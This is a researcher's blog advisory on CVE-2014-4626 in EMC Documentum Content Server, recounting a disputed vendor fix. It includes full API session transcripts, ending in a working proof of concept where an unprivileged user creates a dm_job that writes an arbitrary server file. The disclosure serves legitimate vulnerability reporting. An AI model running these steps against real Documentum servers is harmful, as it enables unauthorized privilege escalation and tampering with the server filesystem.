2015 m. liepos 3 d., penktadienis

Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed


On April 2014 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to elevate privileges, hijack Content Server
filesystem or execute arbitrary commands by creating malicious dm_job
objects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

On October 2014 vendor announced ESA-2014-105 which was claiming that
vulnerability has been remediated.

On November 2014 fix was contested (there was significant delay after
ESA-2014-105 because vendor constantly fails to provide status of reported
vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt,
description provided to CERT/CC (another CNA was chosen because vendor
fails to communicate) was:
=================================8<=========================
=======

The problem is that non-privileged user is able to create dm_job objects and
execute corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here
does mean some sequence of commands which result to existence of dm_job
object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does
not schedule jobs unless they are owned by superuser, so, the command
sequence in that case was: "create dm_job and update dm_job", EMC thinks
that they have fixed vulnerability, but they just fixed the sequence given
in PoC, another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's already known attack.
Also, I could provide third PoC related to this report, but I do not  think
that would be useful for EMC.
=================================>8================================


Current status of CVE-2014-4626 is obscure, last public status could be
found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though latest builds of EMC Documentum Content Server successfully pass PoCs
described previously:
=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
  "Must have system admin privileges or superuser privileges
   to change the owner_name to 'dmadmin'."



API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
                      where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:  "CHANGE:  An unexpected save
      error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
     "The current user (test) needs to have superuser or sysadmin
      privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================


the vulnerability remains unfixed, below is a another PoC (job engine in
Documentum consists of two parts: scheduler and executor, previous attacks
were designed to exploit vulnerability in scheduler, this one demonstrates
how to exploit vulnerability in job executor):
=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,
        ARGUMENTS,S,'
            -docbase_name DCTM_DEV.DCTM_DEV
            -docbase_owner dmadmin
            -job_id 08024be98000690e
            -log_directory /u01/documentum/cs/dba/log
            -docbase_id 150505
            -trace_level 10
       '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

 result                          : 0
 process_id                      : 91436
 launch_failed                   : F
 method_return_val               : 0
 os_system_error                 : No Error
 timed_out                       : F
 time_out_length                 : 60
 app_server_host_name            :
 app_server_port                 : 0
 app_server_uri                  :
 error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================

__
Regards,
Andrey B. Panfilov

Komentarų nėra:

Rašyti komentarą